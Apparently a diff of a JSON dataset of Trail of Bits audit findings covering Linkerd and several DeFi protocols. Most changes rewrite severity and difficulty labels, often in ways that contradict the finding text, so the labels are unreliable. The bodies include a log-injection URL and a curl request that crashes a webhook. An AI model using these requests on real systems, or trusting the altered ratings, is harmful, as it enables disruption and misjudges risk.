*HealthChecker) runCheck(category *Category, c *Checker, observer CheckObserver) bool { for { ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout) defer cancel() err := c.check(ctx) if se, ok := err.(*SkipError); ok { log.Debugf(\"Skipping check: %s. Reason: %s\", c.description, se.Reason) return true } Figure 4.1: pkg/healthcheck/healthcheck.go#L1619-L1628 Recommendations Short term, rather than deferring the call to cancel(), add a call to cancel() at the end of the loop.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -575,7 +545,7 @@ "body": "Requests sent to the TAP service API endpoint, /apis/tap, via the POST method are handled by the handleTap method. This method parses a namespace and a name obtained from the URL of the request. Both the namespace and name variables are then used in a log statement for printing debugging messages to standard output. Because both elds are user controllable, an attacker could perform log injection attacks by calling such API endpoints with a namespace or name with newline indicators, such as \\n. func (h *handler) handleTap(w http.ResponseWriter, req *http.Request, p httprouter.Params) { namespace := p.ByName(\"namespace\") name := p.ByName(\"name\") resource := \"\" // (...) h.log.Debugf(\"SubjectAccessReview: namespace: %s, resource: %s, name: %s, user: <%s>, group: <%s>\", namespace, resource, name, h.usernameHeader, h.groupHeader, ) Figure 7.1: viz/tap/api/handlers.go#L106-L125 Exploit Scenario An attacker submits a POST request to the TAP service API using the URL /apis/tap.linkerd.io/v1alpha1/watch/myns\\nERRO[0000]/tap, causing invalid logs to be printed and tricking an operator into falsely believing there is a failure. Recommendations Short term, ensure that all user-controlled input is sanitized before it is used in the logging function. Additionally, use the format specier %q instead of %s to prompt Go to perform basic sanitation of strings.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, @@ -585,7 +555,7 @@ "body": "Transport Layer Security (TLS) is used in multiple locations throughout the codebase. In two cases, TLS congurations do not have a minimum version requirement, allowing connections from TLS 1.0 and later. This may leave the webhook and TAP API servers vulnerable to protocol downgrade and man-in-the-middle attacks. // NewServer returns a new instance of Server func NewServer( ctx context.Context, api *k8s.API, addr, certPath string, handler Handler, component string, ) (*Server, error) { [...] server := &http.Server{ Addr: addr, TLSConfig: &tls.Config{}, } Figure 8.1: controller/webhook/server.go#L43-L64 // NewServer creates a new server that implements the Tap APIService. func NewServer( ctx context.Context, addr string, k8sAPI *k8s.API, grpcTapServer pb.TapServer, disableCommonNames bool, ) (*Server, error) { [...] httpServer := &http.Server{ Addr: addr, TLSConfig: &tls.Config{ ClientAuth: tls.VerifyClientCertIfGiven, ClientCAs: clientCertPool, }, } Figure 8.2: viz/tap/api/sever.go#L34-L76 Exploit Scenario Due to the lack of minimum TLS version enforcement, certain established connections lack sucient authentication and cryptography. These connections do not protect against man-in-the-middle attacks. Recommendations Short term, review all TLS congurations and ensure the MinVersion eld is set to require connections to be TLS 1.2 or newer. Long term, ensure that all TLS congurations across the codebase enforce a minimum version requirement and employ verication where possible.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, @@ -595,7 +565,7 @@ "body": "The webhook servers processReq function, used for handling admission review requests, does not properly validate request objects. As a result, malformed requests result in nil dereferences, which cause panics on the server. If the server receives a request with a body that cannot be decoded by the decode function, shown below, an error is returned, and a panic is triggered when the system attempts to access the Request object in line 154. A panic could also occur if the request is decoded successfully into an AdmissionReview object with a missing Request property. In such a case, the panic would be triggered in line 162. 149 func (s *Server) processReq(ctx context.Context, data []byte) *admissionv1beta1.AdmissionReview { 150 151 152 153 154 155 156 157 158 159 160 161 162 admissionReview, err := decode(data) if err != nil { log.Errorf(\"failed to decode data. Reason: %s\", err) admissionReview.Response = &admissionv1beta1.AdmissionResponse{ admissionReview.Request.UID, UID: Allowed: false, Result: &metav1.Status{ Message: err.Error(), }, } return admissionReview } log.Infof(\"received admission review request %s\", admissionReview.Request.UID) 163 log.Debugf(\"admission request: %+v\", admissionReview.Request) Figure 9.1: controller/webhook/server.go#L149-L163 We tested the panic by getting a shell on a container running in the application namespace and issuing the request in gure 9.2. However, the Go server recovers from the panics without negatively impacting the application. curl -i -s -k -X $'POST' -H $'Host: 10.100.137.130:443' -H $'Accept: */*' -H $'Content-Length: 6' --data-binary $'aaaaaa' $'https://10.100.137.130:443/inject/test Figure 9.2: The curl request that causes a panic Recommendations Short term, add checks to verify that request objects are not nil before and after they are decoded. Long term, run the invalid-usage-of-modified-variable rule from the set of Semgrep rules in the CI/CD pipeline to detect this type of bug. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -615,7 +585,7 @@ "body": "The lower bound on a collateral assets initial weight (when the collateral is rst whitelisted) is dierent from that enforced if the weight is updated; this discrepancy increases the likelihood of collateral seizures by liquidators. A collateral assets weight represents the level of risk associated with accepting that asset as collateral. This risk calculation comes into play when the protocol is assessing whether a liquidator can seize a users non-UA collateral. To determine the value of each collateral asset, the protocol multiplies the users balance of that asset by the collateral weight (a percentage). A riskier asset will have a lower weight and thus a lower value. If the total value of a users non-UA collateral is less than the users UA debt, a liquidator can seize the collateral. When whitelisting a collateral asset, the Perpetual.addWhiteListedCollateral function requires the collateral weight to be between 10% and 100% (gure 2.1). According to the documentation, these are the correct bounds for a collateral assets weight. function addWhiteListedCollateral ( IERC20Metadata asset, uint256 weight , uint256 maxAmount ) public override onlyRole(GOVERNANCE) { if (weight < 1e17) revert Vault_InsufficientCollateralWeight(); if (weight > 1e18) revert Vault_ExcessiveCollateralWeight(); [...] } Figure 2.1: A snippet of the addWhiteListedCollateral function in Vault.sol#L224-230 However, governance can choose to update that weight via a call to Perpetual.changeCollateralWeight , which allows the weight to be between 1% and 100% (gure 2.2). function changeCollateralWeight (IERC20Metadata asset, uint256 newWeight ) external override onlyRole(GOVERNANCE) { uint256 tokenIdx = tokenToCollateralIdx[asset]; if (!((tokenIdx != 0 ) || ( address (asset) == address (UA)))) revert Vault_UnsupportedCollateral(); if (newWeight < 1e16) revert Vault_InsufficientCollateralWeight(); if (newWeight > 1e18) revert Vault_ExcessiveCollateralWeight(); [...] } Figure 2.2: A snippet of the changeCollateralWeight function in Vault.sol#L254-259 If the weight of a collateral asset were mistakenly set to less than 10%, the value of that collateral would decrease, thereby increasing the likelihood of seizures of non-UA collateral. Exploit Scenario Alice, who holds the governance role, decides to update the weight of a collateral asset in response to volatile market conditions. By mistake, Alice sets the weight of the collateral to 1% instead of 10%. As a result of this change, Bobs non-UA collateral assets decrease in value and are seized. Recommendations Short term, change the lower bound on newWeight in the changeCollateralWeight function from 1e16 to 1e17 . Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: High" ] }, @@ -625,7 +595,7 @@ "body": "The Increment Protocol contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. Security issues due to optimization bugs have occurred in the past . A medium- to high-severity bug in the Yul optimizer was introduced in Solidity version 0.8.13 and was xed only recently, in Solidity version 0.8.17 . Another medium-severity optimization bugone that caused memory writes in inline assembly blocks to be removed under certain conditions was patched in Solidity 0.8.15. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the Increment Protocol contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -636,7 +606,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -656,7 +626,7 @@ "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -665,7 +635,7 @@ "body": "The upper bound on the amount of funds considered dust by the protocol may lead to the premature closure of long positions. The protocol collects dust to encourage complete closures instead of closures that leave a position with a small balance of vBase. One place that dust collection occurs is the Perpetual contracts _reducePositionOnMarket function (gure 7.1). function _reducePositionOnMarket ( LibPerpetual.TraderPosition memory user, bool isLong , uint256 proposedAmount , uint256 minAmount ) internal returns ( int256 baseProceeds , int256 quoteProceeds , int256 addedOpenNotional , int256 pnl ) { int256 positionSize = int256 (user.positionSize); uint256 bought ; uint256 feePer ; if (isLong) { quoteProceeds = -(proposedAmount.toInt256()); (bought, feePer) = _quoteForBase(proposedAmount, minAmount); baseProceeds = bought.toInt256(); } else { (bought, feePer) = _baseForQuote(proposedAmount, minAmount); quoteProceeds = bought.toInt256(); baseProceeds = -(proposedAmount.toInt256()); } int256 netPositionSize = baseProceeds + positionSize; if (netPositionSize > 0 && netPositionSize <= 1e17) { _donate(netPositionSize.toUint256()); baseProceeds -= netPositionSize; } [...] } Figure 7.1: The _reducePositionOnMarket function in Perpetual.sol#L876-921 If netPositionSize , which represents a users position after its reduction, is between 0 and 1e17 (1/10 of an 18-decimal token), the system will treat the position as closed and donate the dust to the insurance protocol. This will occur regardless of whether the user intended to reduce, rather than fully close, the position. (Note that netPositionSize is positive if the overall position is long. The dust collection mechanism used for short positions is discussed in TOB-INC-11 .) However, if netPositionSize is tracking a high-value token, the donation to Insurance will no longer be insignicant; 1/10 of 1 vBTC, for instance, would be worth ~USD 2,000 (at the time of writing). Thus, the donation of a users vBTC dust (and the resultant closure of the vBTC position) could prevent the user from proting o of a ~USD 2,000 position. Exploit Scenario Alice, who holds a long position in the vBTC / vUSD market, decides to close most of her position. After the swap, netPositionSize is slightly less than 1e17. Since a leftover balance of that amount is considered dust (unbeknownst to Alice), her ~1e17 vBTC tokens are sent to the Insurance contract, and her position is fully closed. Recommendations Short term, have the protocol calculate the notional value of netPositionSize by multiplying it by the return value of the indexPrice function. Then have it compare that notional value to the dust thresholds. Note that the dust thresholds must also be expressed in the notional token and that the comparison should not lead to a signicant decrease in a users position. Long term, document this system edge case to inform users that a fraction of their long positions may be donated to the Insurance contract after being reduced.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Medium", "Difficulty: Medium" ] }, @@ -675,8 +645,8 @@ "body": "The protocols use of primitive operations over xed-point signed and unsigned integers increases the risk of overows and undened behavior. The Increment Protocol uses the PRBMathSD59x18 and PRBMathUD60x18 math libraries to perform operations over 59x18 signed integers and 60x18 unsigned integers, respectively (specically to perform multiplication and division and to nd their absolute values). These libraries aid in calculations that involve percentages or ratios or require decimal precision. When a smart contract system relies on primitive integers and xed-point ones, it should avoid arithmetic operations that involve the use of both types. For example, using x.wadMul(y) to multiply two xed-point integers will provide a dierent result than using x * y . For that reason, great care must be taken to dierentiate between variables that are xed-point and those that are not. Calculations involving xed-point values should use the provided library operations; calculations involving both xed-point and primitive integers should be avoided unless one type is converted to the other. However, a number of multiplication and division operations in the codebase use both primitive and xed-point integers. These include those used to calculate the new time-weighted average prices (TWAPs) of index and market prices (gure 8.1). function _updateTwap () internal { uint256 currentTime = block.timestamp ; int256 timeElapsed = (currentTime - globalPosition.timeOfLastTrade).toInt256(); /* */ priceCumulative1 = priceCumulative0 + price1 * timeElapsed // will overflow in ~3000 years // update cumulative chainlink price feed int256 latestChainlinkPrice = indexPrice(); oracleCumulativeAmount += latestChainlinkPrice * timeElapsed ; // update cumulative market price feed int256 latestMarketPrice = marketPrice().toInt256(); marketCumulativeAmount += latestMarketPrice * timeElapsed ; uint256 timeElapsedSinceBeginningOfPeriod = block.timestamp - globalPosition.timeOfLastTwapUpdate; if (timeElapsedSinceBeginningOfPeriod >= twapFrequency) { /* */ TWAP = (priceCumulative1 - priceCumulative0) / timeElapsed // calculate chainlink twap oracleTwap = ((oracleCumulativeAmount - oracleCumulativeAmountAtBeginningOfPeriod) / timeElapsedSinceBeginningOfPeriod.toInt256()).toInt128() ; // calculate market twap marketTwap = ((marketCumulativeAmount - marketCumulativeAmountAtBeginningOfPeriod) / timeElapsedSinceBeginningOfPeriod.toInt256()).toInt128() ; // reset cumulative amount and timestamp oracleCumulativeAmountAtBeginningOfPeriod = oracleCumulativeAmount; marketCumulativeAmountAtBeginningOfPeriod = marketCumulativeAmount; globalPosition.timeOfLastTwapUpdate = block.timestamp .toUint64(); emit TwapUpdated(oracleTwap, marketTwap); } } Figure 8.1: The _updateTwap function in Perpetual.sol#L1071-1110 Similarly, the _getUnrealizedPnL function in the Perpetual contract calculates the tradingFees value by multiplying a primitive and a xed-point integer (gure 8.2). function _getUnrealizedPnL(LibPerpetual.TraderPosition memory trader) internal view returns ( int256 ) { int256 oraclePrice = indexPrice(); int256 vQuoteVirtualProceeds = int256 (trader.positionSize).wadMul(oraclePrice); int256 tradingFees = (vQuoteVirtualProceeds.abs() * market.out_fee().toInt256()) / CURVE_TRADING_FEE_PRECISION; // @dev: take upper bound on the trading fees // in the case of a LONG, trader.openNotional is negative but vQuoteVirtualProceeds is positive // in the case of a SHORT, trader.openNotional is positive while vQuoteVirtualProceeds is negative return int256 (trader.openNotional) + vQuoteVirtualProceeds - tradingFees; } Figure 8.2: The _getUnrealizedPnL function in Perpetual.sol#L1175-1183 These calculations can lead to unexpected overows or cause the system to enter an undened state. Note that there are other such calculations in the codebase that are not documented in this nding. Recommendations Short term, identify all state variables that are xed-point signed or unsigned integers. Additionally, ensure that all multiplication and division operations involving those state variables use the wadMul and wadDiv functions, respectively. If the Increment Finance team decides against using wadMul or wadDiv in any of those operations (whether to optimize gas or for another reason), it should provide inline documentation explaining that decision.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -685,8 +655,8 @@ "body": "Token swaps that are performed to liquidate a position use a hard-coded zero as the minimum-amount-out value, making them vulnerable to sandwich attacks. The minimum-amount-out value indicates the minimum amount of tokens that a user will receive from a swap. The value is meant to provide protection against pool illiquidity and sandwich attacks. Senders of position and liquidity provision updates are allowed to specify a minimum amount out. However, the minimum-amount-out value used in liquidations of both traders and liquidity providers positions is hard-coded to zero. Figures 9.1 and 9.2 show the functions that perform these liquidations ( _liquidateTrader and _liquidateLp , respectively). function _liquidateTrader( uint256 idx, address liquidatee, uint256 proposedAmount ) internal returns ( int256 pnL, int256 positiveOpenNotional) { (positiveOpenNotional) = int256 (_getTraderPosition(idx, liquidatee).openNotional).abs(); LibPerpetual.Side closeDirection = _getTraderPosition(idx, liquidatee).positionSize >= 0 ? LibPerpetual.Side.Short : LibPerpetual.Side.Long; // (liquidatee, proposedAmount) (, , pnL, ) = perpetuals[idx].changePosition(liquidatee, proposedAmount, 0 , closeDirection, true ); // traders are allowed to reduce their positions partially, but liquidators have to close positions in full if (perpetuals[idx].isTraderPositionOpen(liquidatee)) revert ClearingHouse_LiquidateInsufficientProposedAmount(); return (pnL, positiveOpenNotional); } Figure 9.1: The _liquidateTrader function in ClearingHouse.sol#L522-541 function _liquidateLp ( uint256 idx , address liquidatee , uint256 proposedAmount ) internal returns ( int256 pnL , int256 positiveOpenNotional ) { positiveOpenNotional = _getLpOpenNotional(idx, liquidatee).abs(); // close lp (pnL, , ) = perpetuals[idx].removeLiquidity( liquidatee, _getLpLiquidity(idx, liquidatee), [ uint256 ( 0 ), uint256 ( 0 )] , proposedAmount, 0 , true ); _distributeLpRewards(idx, liquidatee); return (pnL, positiveOpenNotional); } Figure 9.2: The _liquidateLp function in ClearingHouse.sol#L543-562 Without the ability to set a minimum amount out, liquidators are not guaranteed to receive any tokens from the pool during a swap. If a liquidator does not receive the correct amount of tokens, he or she will be unable to close the position, and the transaction will revert; the revert will also prolong the Increment Protocols exposure to debt. Moreover, liquidators will be discouraged from participating in liquidations if they know that they may be subject to sandwich attacks and may lose money in the process. Exploit Scenario Alice, a liquidator, notices that a position is no longer valid and decides to liquidate it. When she sends the transaction, the protocol sets the minimum-amount-out value to zero. Eves sandwich bot identies Alices liquidation as a pure prot opportunity and sandwiches it with transactions. Alices liquidation fails, and the protocol remains in a state of debt. Recommendations Short term, allow liquidators to specify a minimum-amount-out value when liquidating the positions of traders and liquidity providers. Long term, document all cases in which front-running may be possible, along with the implications of front-running for the codebase.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: High" ] }, { @@ -695,8 +665,8 @@ "body": "The oracle and market TWAPs can be updated only during traders and liquidity providers interactions with the protocol; a downtick in user interactions will result in less accurate TWAPs that are more susceptible to manipulation. The accuracy of a TWAP is related to the number of data points available for the average price calculation. The less often prices are logged, the less robust the TWAP becomes. In the case of the Increment Protocol, a TWAP can be updated with each block that contains a trader or liquidity provider interaction. However, during a market slump (i.e., a time of reduced network trac), there will be fewer user interactions and thus fewer price updates. TWAP updates are performed by the Perpetual._updateTwap function, which is called by the internal Perpetual._updateGlobalState function. Other protocols, though, take a dierent approach to keeping markets up to date. The Compound Protocol, for example, has an accrueInterest function that is called upon every user interaction but is also a standalone public function that anyone can call. Recommendations Short term, create a public updateGlobalState function that anyone can call to internally call _updateGlobalState . Long term, create an o-chain worker that can alert the team to periods of perpetual market inactivity, ensuring that the team knows to update the market accordingly. 11. Liquidations of short positions may fail because of insu\u0000cient dust collection Severity: Low Diculty: High Type: Data Validation Finding ID: TOB-INC-11 Target: contracts/Perpetual.sol", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -705,7 +675,7 @@ "body": "Although dependency scans did not identify a direct threat to the project under review, yarn audit identied dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the repository under review. The output below details the high-severity vulnerabilities: CVE ID", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, @@ -715,7 +685,7 @@ "body": "Under extreme market conditions, the Chainlink oracle may cease to work as expected, causing unexpected behavior in the Increment Protocol. Such oracle issues have occurred in the past. For example, during the LUNA market crash, the Venus protocol was exploited because Chainlink stopped providing up-to-date prices. The interruption occurred because the price of LUNA dropped below the minimum price ( minAnswer ) allowed by the LUNA / USD price feed on the BNB chain. As a result, all oracle updates reverted. Chainlinks automatic circuit breakers , which pause price feeds during extreme market conditions, could pose similar problems. Note that these kinds of events cannot be tracked on-chain. If a price feed is paused, updatedAt will still be greater than zero, and answeredInRound will still be equal to roundID . Thus, the Increment Finance team should implement an o-chain monitoring solution to detect any anomalous behavior exhibited by Chainlink oracles. The monitoring solution should check for the following conditions and issue alerts if they occur, as they may be indicative of abnormal market events: An asset price that is approaching the minAnswer or maxAnswer value The suspension of a price feed by an automatic circuit breaker Any large deviations in the price of an asset References Chainlink: Risk Mitigation Chainlink: Monitoring Data Feeds Chainlink: Circuit Breakers", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: High" ] }, @@ -746,7 +716,7 @@ "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -755,8 +725,8 @@ "body": "The contracts use Soliditys ABIEncoderV2, which is enabled by default in Solidity version 0.8. This encoder has caused numerous issues in the past, and its use may still pose risks. More than 3% of all GitHub issues for the Solidity compiler are related to current or former experimental features, primarily ABIEncoderV2, which was long considered experimental. Several issues and bug reports are still open and unresolved. ABIEncoderV2 has been associated with more than 20 high-severity bugs, some of which are so recent that they have not yet been included in a Solidity release. For example, in March 2019 a severe bug introduced in Solidity 0.5.5 was found in the encoder. Exploit Scenario The Yield Protocol smart contracts are deployed. After the deployment, a bug is found in the encoder, which means that the contracts are broken and can all be exploited in the same way. Recommendations Short term, use neither ABIEncoderV2 nor any experimental Solidity feature. Refactor the code such that structs do not need to be passed to or returned from functions. Long term, integrate static analysis tools like Slither into the continuous integration pipeline to detect unsafe pragmas. 20 Yield V2", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Undetermined", + "Difficulty: Low" ] }, { @@ -775,7 +745,7 @@ "body": "The buy and payAll functions in the Witch contract enable users to buy collateral at an auction. However, neither function checks whether there is an active auction for the collateral of a vault. As a result, anyone can buy collateral from any vault. This issue also creates an arbitrage opportunity, as the collateral of an overcollateralized vault can be bought at a below-market price. An attacker could drain vaults of their funds and turn a prot through repeated arbitrage. Exploit Scenario Alice, a user of the Yield Protocol, opens an overcollateralized vault. Attacker Bob calls payAll on Alices vault. As a result, Alices vault is liquidated, and she loses the excess collateral (the portion that made the vault overcollateralized). Recommendations Short term, ensure that buy and payAll fail if they are called on a vault for which there is no active auction. Long term, ensure that all functions revert if the system is in a state in which they are not allowed to be called. 22 Yield V2", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: Low" ] }, @@ -785,8 +755,8 @@ "body": "The Yield Protocol V2 contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-jscauses a security vulnerability in the Yield Protocol V2 contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. 23 Yield V2", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Undetermined" + "Severity: Informational", + "Difficulty: Low" ] }, { @@ -795,7 +765,7 @@ "body": "The use of EIP-2612 increases the risk of permit function front-running as well as phishing attacks. EIP-2612 uses signatures as an alternative to the traditional approve and transferFrom ow. These signatures allow a third party to transfer tokens on behalf of a user, with verication of a signed message. The use of EIP-2612 makes it possible for an external party to front-run the permit function by submitting the signature rst. Then, since the signature has already been used and the funds have been transferred, the actual caller's transaction will fail. This could also aect external contracts that rely on a successful permit() call for execution. EIP-2612 also makes it easier for an attacker to steal a users tokens through phishing by asking for signatures in a context unrelated to the Yield Protocol contracts. The hash message may look benign and random to the user. Exploit Scenario Bob has 1,000 iTokens. Eve creates an ERC20 token with a malicious airdrop called ProofOfSignature. To claim the tokens, participants must sign a hash. Eve generates a hash to transfer 1,000 iTokens from Bob. Eve asks Bob to sign the hash to get free tokens. Bob signs the hash, and Eve uses it to steal Bobs tokens. Recommendations Short term, develop user documentation on edge cases in which the signature-forwarding process can be front-run or an attacker can steal a users tokens via phishing. Long term, document best practices for Yield Protocol users. In addition to taking other precautions, users must do the following: Be extremely careful when signing a message Avoid signing messages from suspicious sources 24 Yield V2 Always require hashing schemes to be public References EIP-2612 Security Considerations 25 Yield V2", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -805,7 +775,7 @@ "body": "The Yield Protocol relies on users interacting with the Ladle contract to batch their transactions (e.g., to transfer funds and then mint/burn the corresponding tokens in the same series of transactions). When they deviate from the batched transaction ow, users may lose their funds through front-running. For example, an attacker could front-run the startPool() function to steal the initial mint of strategy tokens. The function relies on liquidity provider (LP) tokens to be transferred to the Strategy contract and then used to mint strategy tokens. The rst time that strategy tokens are minted, they are minted directly to the caller: /// @dev Start the strategy investments in the next pool /// @notice When calling this function for the first pool, some underlying needs to be transferred to the strategy first, using a batchable router. function startPool() external poolNotSelected { [...] // Find pool proportion p = tokenReserves/(tokenReserves + fyTokenReserves) // Deposit (investment * p) base to borrow (investment * p) fyToken // (investment * p) fyToken + (investment * (1 - p)) base = investment // (investment * p) / ((investment * p) + (investment * (1 - p))) = p // (investment * (1 - p)) / ((investment * p) + (investment * (1 - p))) = 1 - p uint256 baseBalance = base.balanceOf(address(this)); 26 Yield V2 require(baseBalance > 0, \"No funds to start with\"); uint256 baseInPool = base.balanceOf(address(pool_)); uint256 fyTokenInPool = fyToken_.balanceOf(address(pool_)); uint256 baseToPool = (baseBalance * baseInPool) / (baseInPool + fyTokenInPool); // Rounds down uint256 fyTokenToPool = baseBalance - baseToPool; // fyTokenToPool is rounded up // Mint fyToken with underlying base.safeTransfer(baseJoin, fyTokenToPool); fyToken.mintWithUnderlying(address(pool_), fyTokenToPool); // Mint LP tokens with (investment * p) fyToken and (investment * (1 - p)) base base.safeTransfer(address(pool_), baseToPool); (,, cached) = pool_.mint(address(this), true, 0); // We don't care about slippage, because the strategy holds to maturity and profits from sandwiching if (_totalSupply == 0) _mint(msg.sender, cached); // Initialize the strategy if needed invariants[address(pool_)] = pool_.invariant(); // Cache the invariant to help the frontend calculate profits emit PoolStarted(address(pool_)); } Figure 9.1: strategy-v2/contracts/Strategy.sol#L146-L194 Exploit Scenario Bob adds underlying tokens to the Strategy contract without using the router. Governance calls setNextPool() with a new pool address. Eve, an attacker, front-runs the call to the startPool() function to secure the strategy tokens initially minted for Bobs underlying tokens. Recommendations Short term, to limit the impact of function front-running, avoid minting tokens to the callers of the protocols functions. 27 Yield V2 Long term, document the expectations around the use of the router to batch transactions; that way, users will be aware of the front-running risks that arise when it is not used. Additionally, analyze the implications of all uses of msg.sender in the system, and ensure that users cannot leverage it to obtain tokens that they do not deserve; otherwise, they could be incentivized to engage in front-running. 28 Yield V2", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: Medium" ] }, @@ -815,27 +785,7 @@ "body": "Strategy contract functions use the contracts balance to determine how many liquidity or base tokens to provide to a user minting or burning tokens. The Strategy contract inherits from the ERC20Rewards contract, which denes a reward token and a reward distribution schedule. An admin must send reward tokens to the Strategy contract to fund its reward payouts. This ow relies on an underlying assumption that the reward token will be dierent from the base token. /// @dev Set a rewards token. /// @notice Careful, this can only be done once. function setRewardsToken(IERC20 rewardsToken_) external auth { } require(rewardsToken == IERC20(address(0)), \"Rewards token already set\"); rewardsToken = rewardsToken_; emit RewardsTokenSet(rewardsToken_); Figure 10.1: yield-utils-v2/contracts/token/ERC20Rewards.sol#L58-L67 The burnForBase() function tracks the Strategy contracts base token balance. If the base token is used as the reward token, the contracts base token balance will be inated to include the reward token balance (and the balance tracked by the function will be incorrect). As a result, when attempting to burn strategy tokens, a user may receive more base tokens than he or she deserves for the number of strategy tokens being burned: /// @dev Burn strategy tokens to withdraw base tokens. It can be called only when a pool is not selected. 29 Yield V2 /// @notice The strategy tokens that the user burns need to have been transferred previously, using a batchable router. function burnForBase(address to) external poolNotSelected returns (uint256 withdrawal) { } // strategy * burnt/supply = withdrawal uint256 burnt = _balanceOf[address(this)]; withdrawal = base.balanceOf(address(this)) * burnt / _totalSupply; _burn(address(this), burnt); base.safeTransfer(to, withdrawal); Figure 10.2: strategy-v2/contracts/Strategy.sol#L258-L271 Exploit Scenario Bob deploys the Strategy contract; DAI is set as a base token of that contract and is also dened as the reward token in the ERC20Rewards contract. After a pool has ocially been closed, Eve uses burnWithBase() to swap base tokens for strategy tokens. Because the calculation takes into account the base tokens balance, she receives more base tokens than she should. Recommendations Short term, add checks to verify that the reward token is not set to the base token, liquidity token, fyToken, or strategy token. These checks will ensure that users cannot leverage contract balances that include reward token balances to turn a prot. Long term, analyze all token interactions in the contract to ensure they do not introduce unexpected behavior into the system. 30 Yield V2 11. Insu\u0000cient protection of sensitive keys Severity: Medium Diculty: High Type: Conguration Finding ID: TOB-YP2-011 Target: hardhat.config.js", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" - ] - }, - { - "title": "15. Withdrawal assumptions may lead to transfers of an incorrect token ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The CurveTricryptoStrategy contract manages liquidity in Curve pools and facilitates transfers of tokens between chains. While it is designed to work with one curve vault, the vault can be set to an arbitrary pool. Thus, the contract should not make assumptions regarding the pool without validation. Each pool contains an array of tokens specifying the tokens to withdraw from that pool. However, when the vault address is set in the constructor of CurveTricryptoConfig , the pools address is not checked against the TriCrypto pools address. The token at index 2 in the coins array is assumed to be wrapped ether (WETH), as indicated by the code comment shown in gure 15.1. If the conguration is incorrect, a dierent token may be unintentionally transferred. if (unwrap) { //unwrap LP into weth transferredToken = tricryptoConfig.tricryptoLPVault().coins( 2 ); [...] Figure 15.1: Part of the transferLPs function in CurveTricryptoStrategy .sol:377-379 Exploit Scenario The Curve pool array, coins , stores an address other than that of WETH in index 2. As a result, a user mistakenly sends the wrong token in a transfer. Recommendations Short term, have the constructor of CurveTricryptoConfig or the transferLPs function validate that the address of transferredToken is equal to the address of WETH. Long term, validate data from external contracts, especially data involved in the transfer of funds.", - "labels": [ - "Trail of Bits", - "Severity: Low", - "Difficulty: Low" - ] - }, - { - "title": "16. Improper validation of Chainlink data ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AdvancedBlockchainQ12022.pdf", - "body": "The latestRoundData function returns a signed integer that is coerced to an unsigned integer without checking that the value is positive. An overow (e.g., uint(-1) ) would result in drastic misrepresentation of the price and unexpected behavior. In addition, ChainlinkLib does not ensure the completeness or recency of round data, so pricing data may not reect recent changes. It is best practice to dene a window in which data is considered suciently recent (e.g., within a minute of the last update) by comparing the block timestamp to updatedAt . (, int256 price , , , ) = _aggregator.latestRoundData(); return uint256 (price); Figure 16.1: Part of the getCurrentTokenPrice function in 